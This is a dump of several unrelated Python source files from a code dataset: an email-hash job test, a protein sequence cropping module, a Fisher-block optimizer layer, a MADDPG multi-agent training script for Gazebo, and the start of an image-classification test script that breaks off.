email_jobs_one_off.EmailHashRegenerationOneOffJob.create_new()\n email_jobs_one_off.EmailHashRegenerationOneOffJob.enqueue(job_id)\n self.assertEqual(\n self.count_jobs_in_taskqueue(\n taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)\n self.process_and_flush_pending_tasks()\n\n def test_hashes_get_generated(self):\n # pylint: disable=unused-argument\n def _generate_hash_for_tests(\n cls, recipient_id, email_subject, email_body):\n \"\"\"Generates hash for tests.\n\n Args:\n recipient_id: str. ID of the recipient.\n email_subject: str. Subject of the email.\n email_body: str. Body of the email.\n\n Returns:\n str. Empty if recipient_id is 'recipient_id2', None if\n 'recipient_id1' and 'Email Hash' otherwise.\n \"\"\"\n\n if recipient_id == 'recipient_id1':\n return None\n elif recipient_id == 'recipient_id2':\n return ''\n return 'Email Hash'\n\n generate_constant_hash_ctx = self.swap(\n email_models.SentEmailModel, '_generate_hash',\n types.MethodType(\n _generate_hash_for_tests,\n email_models.SentEmailModel))\n\n with generate_constant_hash_ctx:\n email_models.SentEmailModel.create(\n 'recipient_id1', 'recipient@email.com', 'sender_id',\n 'sender@email.com', feconf.EMAIL_INTENT_SIGNUP,\n 'Email Subject', 'Email Body', datetime.datetime.utcnow())\n\n email_models.SentEmailModel.create(\n 'recipient_id2', 'recipient@email.com', 'sender_id',\n 'sender@email.com', feconf.EMAIL_INTENT_SIGNUP,\n 'Email Subject', 'Email Body', datetime.datetime.utcnow())\n\n email_models.SentEmailModel.create(\n 'recipient_id3', 'recipient@email.com', 'sender_id',\n 'sender@email.com', feconf.EMAIL_INTENT_SIGNUP,\n 'Email Subject', 'Email Body', datetime.datetime.utcnow())\n\n # Check that all the emails were recorded in SentEmailModel.\n all_models = email_models.SentEmailModel.get_all().fetch()\n self.assertEqual(len(all_models), 3)\n\n for model in all_models:\n if model.recipient_id == 'recipient_id1':\n self.assertIsNone(model.email_hash)\n elif model.recipient_id == 'recipient_id2':\n self.assertEqual(len(model.email_hash), 0)\n\n self._run_one_off_job()\n\n # Check that all the emails that were recorded in SentEmailModel\n # still present.\n all_models = email_models.SentEmailModel.get_all().fetch()\n self.assertEqual(len(all_models), 3)\n\n all_models = email_models.SentEmailModel.get_all().fetch()\n\n for model in all_models:\n self.assertIsNotNone(model.email_hash)\n","sub_path":"core/domain/email_jobs_one_off_test.py","file_name":"email_jobs_one_off_test.py","file_ext":"py","file_size_in_byte":4126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"342819781","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport gemmi\nimport csv\nfrom conkit import io as ckio\nfrom conkit import core as ckc\n\n\nfrom .inputvalues import CSV_CHAIN_PATH\nfrom .init2 import pdbid\nfrom .init2 import ressymbol\nfrom .output import output_tmpdir\nfrom .output import printout\n#########################################################\n##### SEQUENCE-RELATED FUNCTIONS ########################\n\n# INTERFACE PDB CROPPING AND RENUMBERING\ndef renumberpdbs(PDBINT_PATH, fastaseq,itisbio=False,outdir=output_tmpdir(\"pisacov\")):\n \"\"\"\n INTERFACE PDB CROPPING AND RENUMBERING\n\n Parameters\n ----------\n PDBINT_PATH : str\n Input path.\n fastaseq : ConKit sequence\n Full fasta sequence from PDB database\n itisbio : bool\n Use limits given by SIFTS (True) or whole sequence (False) (def: False)\n\n Returns\n -------\n None\n\n \"\"\"\n n_chains = 0\n n_resmax = 0\n pdb_structure = gemmi.read_structure(PDBINT_PATH)\n\n for model in pdb_structure:\n n_chains += len(model)\n for chain in model:\n if len(chain) > n_resmax:\n n_resmax = len(chain)\n\n pos = [[0 for j in range(n_resmax)] for i in range(n_chains)]\n\n n_chains = 0\n\n ninterface=(os.path.splitext(os.path.splitext(PDBINT_PATH)[0])[1])[1:]\n printout('INTERFACE: ' + str(ninterface))\n for model in pdb_structure:\n for chain in model:\n solved = False\n for shift in range(int(len(chain)/2)):\n cnt=0\n gap=0\n score=0\n newseq=''\n newseq += '-'*shift\n for residue in chain:\n if residue == chain[0]:\n if ressymbol(residue.name) == fastaseq.seq[shift]:\n score += 1\n pos[n_chains][cnt]=1+shift\n newseq += ressymbol(residue.name)\n else:\n if (chain[cnt].seqid.num-chain[cnt-1].seqid.num > 1):\n gap += (chain[cnt].seqid.num-chain[cnt-1].seqid.num-1)\n newseq += '-'*(chain[cnt].seqid.num-chain[cnt-1].seqid.num-1)\n pos[n_chains][cnt]=cnt+1+gap+shift\n if ressymbol(residue.name) == fastaseq.seq[cnt+gap+shift]:\n score += 1\n newseq += ressymbol(residue.name)\n if residue==chain[-1]:\n if cnt+gap+shift+1 < len(fastaseq.seq):\n newseq += '-'*(len(fastaseq.seq)-(cnt+gap+shift+1))\n cnt += 1\n if score == len(chain):\n solved = True\n printout('ALIGNMENT OF CHAIN ' + str(n_chains+1))\n printout(fastaseq.seq)\n printout(newseq, extraline=True)\n break\n if solved:\n cnt=0\n for residue in chain:\n residue.seqid.num = pos[n_chains][cnt]\n cnt += 1\n n_chains += 1\n solved = False\n\n PDBINT_PATH_OUT=os.path.join(outdir, os.path.splitext(os.path.basename(PDBINT_PATH))[0]+\".fasta.pdb\")\n pdb_structure.write_pdb(PDBINT_PATH_OUT)\n\n if itisbio:\n PDBINT_PATH_OUT=os.path.join(outdir, os.path.splitext(os.path.basename(PDBINT_PATH))[0]+\".bio.fasta.pdb\")\n\n n_chains = 0\n n_resmax = 0\n for model in pdb_structure:\n n_chains += len(model)\n for chain in model:\n if len(chain) > n_resmax:\n n_resmax = len(chain)\n delres = [[False for j in range(n_resmax)] for i in range(n_chains)]\n n_chains = 0\n for model in pdb_structure:\n for chain in model:\n r=0\n newresnum=1\n fastaends=biochain_ends('fasta')\n for residue in chain:\n if residue.seqid.num < fastaends[0]:\n delres[n_chains][r] = True\n elif residue.seqid.num > fastaends[1]:\n delres[n_chains][r] = True\n elif residue.seqid.num == fastaends[0]:\n prev_res_num = residue.seqid.num\n residue.seqid.num = 1\n else:\n if residue == chain[0]:\n prev_res_num = residue.seqid.num\n residue.seqid.num = residue.seqid.num - fastaends[0] + 1\n else:\n if (residue.seqid.num - prev_res_num == 0 ): # SEQUENCE NUMBERS INSERTED (1A, 1B, 1C, ...)\n newresnum += 1\n prev_res_num = residue.seqid.num\n residue.seqid.num = newresnum\n elif (residue.seqid.num - prev_res_num == 1 ): # SEQUENCE NUMBERS ARE CONSECUTIVE\n newresnum += 1\n prev_res_num = residue.seqid.num\n residue.seqid.num = newresnum\n elif (residue.seqid.num - prev_res_num > 1 ): # SEQUENCE NUMBERS SHOW GAPS\n newresnum += residue.seqid.num- prev_res_num\n prev_res_num = residue.seqid.num\n residue.seqid.num = newresnum\n else:\n print('residue : ' + str(residue.seqid.num))\n print('previous: ' + str(prev_res_num))\n printout(' ERROR: Sequence numbers not sorted',extraline=True, errorlog=True)\n r += 1\n n_chains += 1\n\n n_chains = 0\n for model in pdb_structure:\n for chain in model:\n for res in reversed(range(len(chain))):\n if delres[n_chains][res]:\n del chain[res]\n n_chains += 1\n\n pdb_structure.write_pdb(PDBINT_PATH_OUT)\n\ndef biochain_ends(which):\n \"\"\"\n RETRIEVE SEQUENCE POSITION OF BIOLOGICAL PROTEIN CHAIN ENDS FROM CSV FILE (SIFTS)\n\n Parameters\n ----------\n which : str\n Either 'fasta' or 'pdb'\n\n Returns\n -------\n resends : list(int), dim=2\n The position (sequence numbers) of the biological ends at the pdb file\n\n \"\"\"\n\n #pdbid=os.path.splitext(os.path.basename(PDB_PATH))[0]\n csv_chain_file = open(CSV_CHAIN_PATH)\n csv_chain = csv.reader(csv_chain_file)\n\n resends = [0 for i in range(2)]\n\n for entry in csv_chain:\n if entry[0] == pdbid() and entry[1]==\"A\":\n if which == 'fasta':\n resends[0]=int(entry[3])\n resends[1]=int(entry[4])\n elif which == 'pdb':\n resends[0]=int(entry[7])\n resends[1]=int(entry[8])\n break\n return resends\n\n\ndef crop_fasta(fastaseq, outdir=output_tmpdir()):\n \"\"\"\n FASTA SEQUENCE CROPPING\n\n Parameters\n ----------\n seqpath : ConKit Sequence\n Source fasta sequence\n outdir : str, optional\n Directory where results biological sequence will be printed out. The default is output_tmpdir().\n\n Returns\n -------\n bioseq : ConKit Sequence\n Cropped (biological) sequence\n newseqpath : str\n Sequence path (bio.fasta file)\n\n \"\"\"\n # Obtain new chain ends (residue number)\n fastaends = biochain_ends('fasta')\n\n # Check that the sequence is consistent with the limits retrieved from the database\n if fastaends[1]-fastaends[0] + 1 > fastaseq.seq_len:\n isitbio=False\n printout('WARNING: The biological sequence limits include a section greater than the input sequence.', errorlog=True)\n printout(' Skipping cropping. Returning input values.', errorlog=True,extraline=True)\n bioseq = fastaseq\n newseqfile = pdbid() + '.fasta'\n newseqpath = os.path.join(outdir, newseqfile)\n elif fastaends[1]-fastaends[0] + 1 == fastaseq.seq_len:\n isitbio=True\n printout(' Biological and input sequences have the same length. Skipping cropping. Returning input values.',extraline=True)\n bioseq = fastaseq\n newseqfile = pdbid() + '.bio.fasta'\n newseqpath = os.path.join(outdir, newseqfile)\n ckio.write(newseqpath,\"fasta\",hierarchy=bioseq)\n else:\n if fastaends[0] > fastaseq.seq_len:\n isitbio=False\n printout('WARNING: The sequence upper limit imported from the database is higher than the upper limit from the fasta file.',errorlog=True) #LOGGING\n printout(' Skipping cropping. Returning input values.', errorlog=True,extraline=True)\n bioseq = fastaseq\n newseqfile = pdbid() + '.fasta'\n newseqpath = os.path.join(outdir, newseqfile)\n else:\n isitbio=True\n # Append new info to sequence\n newid=fastaseq.id\n newid = newid +\"|NO_CLONING_ARTIFACTS\"\n\n # Create new sequence\n newseq=fastaseq.seq[fastaends[0]-1:fastaends[1]-1]\n bioseq=ckc.Sequence(newid, newseq)\n\n # Write new sequence to file\n #locpdbid=os.path.splitext(os.path.basename(PDB_PATH))[0]\n #outdir = os.path.join(OUTPUT_DIR, locpdbid,\"\")\n\n newseqfile = pdbid() + '.bio.fasta'\n newseqpath = os.path.join(outdir, newseqfile)\n\n ckio.write(newseqpath,\"fasta\",hierarchy=bioseq)\n\n return bioseq, newseqpath, isitbio\n\ndef biofile(itisbio):\n \"\"\"\n Returns string containing \".bio\" or empty string depending on fasta sequence employed\n\n Parameters\n ----------\n itisbio : bool\n Contains information about the nature of fasta sequence.\n\n Returns\n -------\n bio_path : str\n Either \".bio\" or empty string.\n\n \"\"\"\n if itisbio:\n bio_path='.bio'\n else:\n bio_path=''\n\n return bio_path","sub_path":"pisacov/pisacovmods/sequence_ok.py","file_name":"sequence_ok.py","file_ext":"py","file_size_in_byte":10067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"25905564","text":"from torch import einsum, eye, matmul, ones_like, norm\nfrom torch.linalg import inv\n\nfrom backpack.core.derivatives.linear import LinearDerivatives\nfrom backpack.extensions.firstorder.fisher_block.fisher_block_base import FisherBlockBase\n\n\nclass FisherBlockLinear(FisherBlockBase):\n def __init__(self, damping=1.0, alpha=0.95):\n self.damping = damping\n self.alpha = alpha\n super().__init__(derivatives=LinearDerivatives(), params=[\"bias\", \"weight\"])\n\n def weight(self, ext, module, g_inp, g_out, backproped):\n # print(g_out)\n\n # check if there are stored variables:\n # if hasattr(module, \"I\"):\n # this is a sampling technique\n # inp = module.I\n # l = inp.shape[0]\n # prob = 0.1\n # l_new = int(np.floor(prob * l))\n\n # # print('input to linear layer before droput:', inp.shape)\n # Borg = einsum(\"ni,li->nl\", (inp, inp)) \n\n # if inp.shape[1] > 7000:\n # inp = inp[:, torch.randint(l, (l_new,))] \n\n # B = einsum(\"ni,li->nl\", (inp, inp)) / ( prob)\n \n\n\n\n I = module.input0\n n = g_out[0].shape[0]\n g_out_sc = n * g_out[0]\n G = g_out_sc\n grad = module.weight.grad\n \n \n B = einsum(\"ni,li->nl\", (I, I)) \n A = einsum(\"no,lo->nl\", (G, G))\n\n # compute vector jacobian product in optimization method\n grad_prod = einsum(\"ni,oi->no\", (I, grad))\n grad_prod = einsum(\"no,no->n\", (grad_prod, G))\n # grad_prod = 0\n out = A * B \n # out = 0\n NGD_kernel = out / n\n NGD_inv = inv(NGD_kernel + self.damping * eye(n).to(grad.device))\n v = matmul(NGD_inv, grad_prod.unsqueeze(1)).squeeze()\n\n gv = einsum(\"n,no->no\", (v, G))\n gv = einsum(\"no,ni->oi\", (gv, I))\n gv = gv / n\n\n update = (grad - gv)/self.damping\n # update = grad\n\n # store for later use:\n # module.A = A\n # module.B = B\n # module.out = out\n module.I = I\n module.G = G\n module.NGD_inv = NGD_inv\n return (out, grad_prod, update)\n \n\n\n def bias(self, ext, module, g_inp, g_out, backproped):\n\n grad = module.bias.grad\n n = g_out[0].shape[0]\n g_out_sc = n * g_out[0]\n\n # compute vector jacobian product in optimization method\n grad_prod = einsum(\"no,o->n\", (g_out_sc, grad))\n # grad_prod = 0\n out = einsum(\"no,lo->nl\", g_out_sc, g_out_sc)\n # out = 0\n\n\n NGD_kernel = out / n\n NGD_inv = inv(NGD_kernel + self.damping * eye(n).to(grad.device))\n v = matmul(NGD_inv, grad_prod.unsqueeze(1)).squeeze()\n gv = einsum(\"n,no->o\", (v, g_out_sc))\n gv = gv / n\n\n update = (grad - gv)/self.damping\n # update = grad\n\n return (out, grad_prod, update)\n \n\n","sub_path":"backpack/extensions/firstorder/fisher_block/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"423882013","text":"#!/usr/bin/env python\n# ROS\nimport rospy\n\n# Env\nimport os\nimport numpy as np\nimport random, collections\nimport math\nimport time\nimport argparse\n\n# RL training\nfrom copy import deepcopy\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom collections import namedtuple\n\n# Parameter\nfrom easydict import EasyDict\nimport json\n\n# Tensorboard\nfrom torch.utils.tensorboard import SummaryWriter\n\n# Utils\nimport Utils\nfrom Env import Gazebo_Env\nfrom Train_Utils import soft_update, hard_update, OrnsteinUhlenbeckProcess\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--model_path', type=str, default=None)\nparser.add_argument('--test', type=bool, default=False)\nargs = parser.parse_args()\n\n##############################################################################\n#Hyperparameters\nif (args.model_path == None):\n config = EasyDict({\n \"start_epi\" : 0,\n \"n_agents\" : 2,\n \"n_targets\" : 1,\n \"dim_obs\" : 25,\n \"dim_act\" : 3,\n \"batch_size\" : 1024,\n \"capacity\" : 1000000,\n \"lr_ac\" : 0.0001,\n \"lr_cr\" : 0.001,\n \"gamma\" : 0.95,\n \"first_hidden_layer\" : 128,\n \"second_hidden_layer\" : 64,\n \"tau\" : 0.01, # for target network soft update\n \"delay_step\" : 10,\n \"n_episode\" : 2000,\n \"episodes_before_train\" : 0,\n \"dim_laser\" : 100\n })\nelse:\n json_path = args.model_path + \"/config.json\"\n json_file = open(json_path)\n json_data = json.load(json_file)\n \n config = EasyDict({\n \"start_epi\" : json_data[\"start_epi\"],\n \"n_agents\" : json_data[\"n_agents\"],\n \"n_targets\" : json_data[\"n_targets\"],\n \"dim_obs\" : json_data[\"dim_obs\"],\n \"dim_act\" : json_data[\"dim_act\"],\n \"batch_size\" : json_data[\"batch_size\"],\n \"capacity\" : json_data[\"capacity\"],\n \"lr_ac\" : json_data[\"lr_ac\"],\n \"lr_cr\" : json_data[\"lr_cr\"],\n \"gamma\" : json_data[\"gamma\"],\n \"first_hidden_layer\" : json_data[\"first_hidden_layer\"],\n \"second_hidden_layer\" : json_data[\"second_hidden_layer\"],\n \"tau\" : json_data[\"tau\"], # for target network soft update\n \"delay_step\" : json_data[\"delay_step\"],\n \"n_episode\" : json_data[\"n_episode\"],\n \"episodes_before_train\" : json_data[\"episodes_before_train\"],\n \"dim_laser\" : json_data[\"dim_laser\"]\n })\n\n\n##############################################################################################################\n# MADDPG Random Process\nclass MADDPG:\n def __init__(self, n_agents, dim_obs, dim_act, dim_laser, batch_size, first_hidden_layer, second_hidden_layer,\n capacity, episodes_before_train, gamma, tau, lr_cr, lr_ac):\n\n self.actors = [Actor(dim_obs, dim_act, dim_laser, first_hidden_layer, second_hidden_layer) for i in range(n_agents)]\n self.critics = [Critic(n_agents, dim_obs, dim_act, dim_laser, first_hidden_layer, second_hidden_layer) for i in range(n_agents)]\n\n self.actors_target = deepcopy(self.actors)\n self.critics_target = deepcopy(self.critics)\n\n self.n_agents = n_agents\n self.n_states = dim_obs\n self.n_actions = dim_act\n self.n_laser = dim_laser\n self.memory = ReplayMemory(capacity)\n self.batch_size = batch_size\n self.use_cuda = torch.cuda.is_available()\n self.episodes_before_train = episodes_before_train\n\n self.GAMMA = gamma\n self.tau = tau\n\n self.var = [1.0 for i in range(n_agents)]\n cnt = 0\n if (args.test == False):\n while (self.var[0] > 0.05 and cnt < config.start_epi - episodes_before_train):\n for i in range(len(self.var)):\n self.var[i] *= 0.999998\n cnt += 1\n \n self.critic_optimizer = [optim.Adam(x.parameters(), lr=lr_cr) for x in self.critics]\n self.actor_optimizer = [optim.Adam(x.parameters(), lr=lr_ac) for x in self.actors]\n\n if self.use_cuda:\n for x in self.actors:\n x.cuda()\n for x in self.critics:\n x.cuda()\n for x in self.actors_target:\n x.cuda()\n for x in self.critics_target:\n x.cuda()\n\n self.steps_done = 0\n self.episode_done = 0\n\n def update_policy(self):\n # do not train until exploration is enough\n if self.episode_done <= self.episodes_before_train:\n return None, None\n\n BoolTensor = torch.cuda.BoolTensor if self.use_cuda else torch.BoolTensor\n FloatTensor = torch.cuda.FloatTensor if self.use_cuda else torch.FloatTensor\n\n c_loss = []\n a_loss = []\n for agent in range(self.n_agents):\n transitions = self.memory.sample(self.batch_size)\n batch = Experience(*zip(*transitions))\n non_final_mask = BoolTensor(list(map(lambda s: s is not None, batch.next_states)))\n\n # state_batch: batch_size x n_agents x dim_obs\n state_batch = torch.stack(batch.states).type(FloatTensor)\n laser_batch = torch.stack(batch.laser).type(FloatTensor)\n action_batch = torch.stack(batch.actions).type(FloatTensor)\n reward_batch = torch.stack(batch.rewards).type(FloatTensor)\n\n # : (batch_size_non_final) x n_agents x dim_obs\n non_final_next_states = torch.stack([s for s in batch.next_states if s is not None]).type(FloatTensor)\n non_final_next_lasers = torch.stack([l for l in batch.next_laser if l is not None]).type(FloatTensor)\n\n # for current agent\n whole_state = state_batch.view(self.batch_size, -1)\n whole_laser = laser_batch.view(self.batch_size, -1)\n whole_action = action_batch.view(self.batch_size, -1)\n self.critic_optimizer[agent].zero_grad()\n current_Q = self.critics[agent](whole_state, whole_action, whole_laser)\n\n # n_agents x batch_size_non_final x next_action\n non_final_next_actions = [self.actors_target[i](non_final_next_states[:, i, :], non_final_next_lasers[:, i, :]) for i in range(self.n_agents)]\n non_final_next_actions = torch.stack(non_final_next_actions)\n\n # batch_size_non_final x n_agents x next_action\n non_final_next_actions = (non_final_next_actions.transpose(0, 1).contiguous())\n\n target_Q = torch.zeros(self.batch_size).type(FloatTensor)\n target_Q[non_final_mask] = self.critics_target[agent](\n non_final_next_states.view(-1, self.n_agents * self.n_states),\n non_final_next_actions.view(-1, self.n_agents * self.n_actions),\n non_final_next_lasers.view(-1, self.n_agents * self.n_laser)\n ).squeeze()\n\n # TD Target = r + gamma * target_Q\n # TD Target shape : batch_size x 1 (agent)\n target_Q = (target_Q.unsqueeze(1) * self.GAMMA) + (reward_batch[:, agent].unsqueeze(1))\n\n # Update Critic Network\n loss_Q = nn.MSELoss()(current_Q, target_Q.detach())\n loss_Q.backward()\n self.critic_optimizer[agent].step()\n\n # Update Actor Network\n self.actor_optimizer[agent].zero_grad()\n state_i = state_batch[:, agent, :]\n laser_i = laser_batch[:, agent, :]\n action_i = self.actors[agent](state_i, laser_i)\n ac = action_batch.clone()\n ac[:, agent, :] = action_i\n whole_action = ac.view(self.batch_size, -1)\n\n # check replace true action(from buffer) to each agent's policy from obs --> make whole action from self.actor[agent](state_batch[:, agent, :])\n actor_loss = -self.critics[agent](whole_state, whole_action, whole_laser).mean()\n \n # check performance\n # actor_loss += (action_i ** 2).mean() * 1e-3 # from openai reference code\n\n actor_loss.backward()\n self.actor_optimizer[agent].step()\n\n c_loss.append(loss_Q)\n a_loss.append(actor_loss)\n\n if self.steps_done % 100 == 0 and self.steps_done > 0:\n for i in range(self.n_agents):\n soft_update(self.critics_target[i], self.critics[i], self.tau)\n soft_update(self.actors_target[i], self.actors[i], self.tau)\n\n return c_loss, a_loss\n\n def select_action(self, state_batch, laser_batch):\n # state_batch: n_agents x state_dim\n actions = torch.zeros(\n self.n_agents,\n self.n_actions)\n FloatTensor = torch.cuda.FloatTensor if self.use_cuda else torch.FloatTensor\n for i in range(self.n_agents):\n sb = state_batch[i, :].detach()\n lb = laser_batch[i, :].detach()\n act = self.actors[i](sb.unsqueeze(0), lb.unsqueeze(0)).squeeze()\n\n act += torch.from_numpy(\n np.random.randn(self.n_actions) * self.var[i]).type(FloatTensor)\n\n if self.episode_done > self.episodes_before_train and self.var[i] > 0.05:\n self.var[i] *= 0.999998\n act = torch.clamp(act, -1.0, 1.0)\n\n actions[i, :] = act\n self.steps_done += 1\n\n return actions\n##############################################################################################################\n# MADDPG Replay Buffer\nExperience = namedtuple('Experience',\n ('states', 'laser', 'actions', 'next_states', 'next_laser', 'rewards'))\n\nclass ReplayMemory:\n def __init__(self, capacity):\n self.capacity = capacity\n self.memory = []\n self.position = 0\n\n def push(self, *args):\n if len(self.memory) < self.capacity:\n self.memory.append(None)\n self.memory[self.position] = Experience(*args)\n self.position = (self.position + 1) % self.capacity\n\n def sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n##############################################################################################################\n# MADDPG Model\nclass Critic(nn.Module):\n def __init__(self, n_agent, dim_observation, dim_action, laser_cnt, hidden_layer=128, second_hidden_layer=64):\n super(Critic, self).__init__()\n self.n_agent = n_agent\n self.dim_observation = dim_observation\n self.dim_action = dim_action\n obs_dim = dim_observation * n_agent\n act_dim = self.dim_action * n_agent\n las_dim = laser_cnt * n_agent\n\n self.PreFC = nn.Linear(las_dim, 10)\n self.FC1 = nn.Linear(obs_dim + 10 + act_dim, hidden_layer)\n self.FC2 = nn.Linear(hidden_layer, second_hidden_layer)\n self.FC3 = nn.Linear(second_hidden_layer, 1)\n\n # self.PreFC = nn.Linear(las_dim, 10)\n # self.FC1 = nn.Linear(obs_dim + 10, hidden_layer)\n # self.FC2 = nn.Linear(hidden_layer+act_dim, second_hidden_layer)\n # self.FC3 = nn.Linear(second_hidden_layer, 1)\n\n # obs: batch_size * obs_dim\n def forward(self, obs, acts, laser):\n result = F.relu(self.PreFC(laser))\n combined = torch.cat([result, obs, acts], 1)\n result = F.relu(self.FC1(combined))\n result = F.relu(self.FC2(result))\n\n # result = F.relu(self.PreFC(laser))\n # combined = torch.cat([result, obs], 1)\n # result = F.relu(self.FC1(combined))\n # combined = torch.cat([result, acts], 1)\n # result = F.relu(self.FC2(combined))\n\n return self.FC3(result)\n\n\nclass Actor(nn.Module):\n def __init__(self, dim_observation, dim_action, laser_cnt, hidden_layer=128, second_hidden_layer=64):\n super(Actor, self).__init__()\n self.PreFC = nn.Linear(laser_cnt, 10)\n self.FC1 = nn.Linear(dim_observation + 10, hidden_layer)\n self.FC2 = nn.Linear(hidden_layer, second_hidden_layer)\n self.FC3 = nn.Linear(second_hidden_layer, dim_action)\n\n def forward(self, obs, laser):\n result = F.relu(self.PreFC(laser))\n combined = torch.cat([result, obs], 1)\n result = F.relu(self.FC1(combined))\n result = F.relu(self.FC2(result))\n result = torch.tanh(self.FC3(result)) * 0.5\n return result\n\n##################################################################################\n\ndef main():\n env = Gazebo_Env(config.n_agents, config.n_targets, config.dim_laser)\n reward_record = []\n\n print_interval = 10\n score = 0\n\n maddpg = MADDPG(config.n_agents, config.dim_obs, config.dim_act, config.dim_laser, config.batch_size, config.first_hidden_layer, config.second_hidden_layer, \n config.capacity, config.episodes_before_train, config.gamma, config.tau, config.lr_cr, config.lr_ac)\n\n if (args.model_path != None):\n file_list = os.listdir(args.model_path)\n\n max_index = 0\n max_value = 0\n for idx in range(len(file_list)):\n if(Utils.isint(file_list[idx][5:-4])):\n if(max_value < int(file_list[idx][5:-4])):\n max_index = idx\n max_value = int(file_list[idx][5:-4])\n last_file = file_list[max_index]\n\n path = args.model_path + '/' + last_file\n print(path)\n\n checkpoint = torch.load(path)\n start_epi = checkpoint['n_epi']\n # start_epi = 0\n for a, aopt, params, opt in zip(maddpg.actors, maddpg.actor_optimizer, checkpoint['actor_params'], checkpoint['actor_optim']):\n a.load_state_dict(params)\n aopt.load_state_dict(opt)\n for a, aopt, params, opt in zip(maddpg.critics, maddpg.critic_optimizer, checkpoint['critic_params'], checkpoint['critic_optim']):\n a.load_state_dict(params)\n aopt.load_state_dict(opt)\n else:\n start_epi = config.start_epi\n\n # tensorboard --logdir=runs\n writer = SummaryWriter()\n rate = rospy.Rate(20)\n\n time.sleep(3)\n print(\"Start Training\")\n\n FloatTensor = torch.cuda.FloatTensor if maddpg.use_cuda else torch.FloatTensor\n for i_episode in range(start_epi, config.n_episode):\n obs, laser = env.reset()\n if isinstance(obs, np.ndarray):\n obs = torch.from_numpy(obs).float()\n if isinstance(laser, np.ndarray):\n laser = torch.from_numpy(laser).float()\n\n total_reward = 0.0\n n_step = 0\n\n past_obs_list = []\n past_laser_list= []\n past_action_list = []\n \n done = False\n rr = np.zeros((config.n_agents,))\n\n while not done:\n n_step += 1\n obs = obs.type(FloatTensor)\n laser = laser.type(FloatTensor)\n action = maddpg.select_action(obs, laser).data.cpu()\n obs_, laser_, done, reward, _ = env.step(action.numpy().tolist())\n\n reward = torch.FloatTensor(reward).type(FloatTensor)\n obs_ = torch.from_numpy(obs_).float()\n laser_ = torch.from_numpy(laser_).float()\n\n if done:\n next_obs = None\n next_laser = None\n else:\n next_obs = obs_\n next_laser = laser_\n\n total_reward += reward.sum()\n rr += reward.cpu().numpy()\n\n if (n_step < config.delay_step):\n past_obs_list.append(obs.data)\n past_laser_list.append(laser.data)\n past_action_list.append(action)\n else:\n maddpg.memory.push(past_obs_list.pop(0), past_laser_list.pop(0), past_action_list.pop(0), next_obs, next_laser, reward)\n past_obs_list.append(obs.data)\n past_laser_list.append(laser.data)\n past_action_list.append(action)\n\n obs = next_obs\n laser = next_laser\n\n if (args.test == False):\n c_loss, a_loss = maddpg.update_policy()\n rate.sleep()\n\n score += total_reward\n maddpg.episode_done += 1\n reward_record.append(total_reward)\n\n writer.add_scalar(\"Reward function\", total_reward, i_episode)\n print(\"Reward : \" + str(total_reward))\n print(\" \")\n\n if i_episode == 0:\n model_path = os.path.join(\"/home/dwkim/RL_ws/src/rl/src\", Utils.Save_path)\n if not os.path.isdir(model_path):\n os.makedirs(model_path)\n \n with open(model_path + '/config.json', 'w') as f:\n json.dump(vars(config), f)\n\n if i_episode % print_interval == 0 and i_episode != 0:\n avg_score_str = str(int(score/print_interval))\n ckpt_path = os.path.join(model_path, 'ckpt_'+ avg_score_str + '.pth')\n\n torch.save(\n {\n 'n_epi' : i_episode,\n 'actor_params' : [a.state_dict() for a in maddpg.actors],\n 'critic_params' : [a.state_dict() for a in maddpg.critics],\n 'actor_optim' : [a.state_dict() for a in maddpg.actor_optimizer],\n 'critic_optim' : [a.state_dict() for a in maddpg.critic_optimizer],\n }, ckpt_path)\n\n print(\"# of episode :{}, avg score : {:.1f}\".format(i_episode, score/print_interval))\n score = 0.0\n \nif __name__ == '__main__':\n main()","sub_path":"Main_MADDPG.py","file_name":"Main_MADDPG.py","file_ext":"py","file_size_in_byte":17626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"100893437","text":"#coding=utf-8\nimport os\nimport sys\n\nos.environ['CUDA_DEVICE_ORDRE'] = 'PCI_BUS_ID'\nos.environ['CUDA_VISIBLE_DEVICES'] = '0,1,2,3,4,5,6,7'\n\nimport json\nimport csv\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom math import ceil\nfrom tqdm import tqdm\nimport pickle\nimport shutil\nimport collections\nfrom sklearn.metrics.pairwise import cosine_similarity, paired_distances\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.nn import CrossEntropyLoss\nfrom torchvision import datasets, models\nimport torch.backends.cudnn as cudnn\nimport torch.nn.functional as F\n\nfrom transforms import transforms\nfrom models.LoadModel import MainModel\nfrom utils.dataset_DCL import collate_fn4cvpr, dataset\nfrom config import LoadConfig, load_data_transformers\nfrom utils.test_tool import set_text, save_multi_img, cls_base_acc\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='dcl parameters')\n parser.add_argument('--data', dest='dataset', default='food', type=str)\n parser.add_argument('--backbone',\n dest='backbone',\n default='dm_nfnet_f3',\n type=str)\n parser.add_argument('--b', dest='batch_size', default=104, type=int)\n parser.add_argument('--nw', dest='num_workers', default=32, type=int)\n parser.add_argument('--ver', dest='version', default='test', type=str)\n parser.add_argument(\n '--save',\n dest='resume',\n default='./net_model/_83113_food/weights_5_2316_0.9885_0.9964.pth',\n type=str)\n parser.add_argument('--size',\n dest='resize_resolution',\n default=438,\n type=int)\n parser.add_argument('--crop',\n dest='crop_resolution',\n default=384,\n type=int)\n parser.add_argument('--ss', dest='save_suffix', default=None, type=str)\n parser.add_argument('--acc_report',\n dest='acc_report',\n default=True,\n type=bool)\n parser.add_argument('--swap_num',\n default=[7, 7],\n nargs=2,\n metavar=('swap1', 'swap2'),\n type=int,\n help='specify a range')\n args = parser.parse_args()\n return args\n\n\ndef merge_crop_files(file_list):\n for ind, file in enumerate(file_list):\n out_name = file.replace('crop_', '')\n if 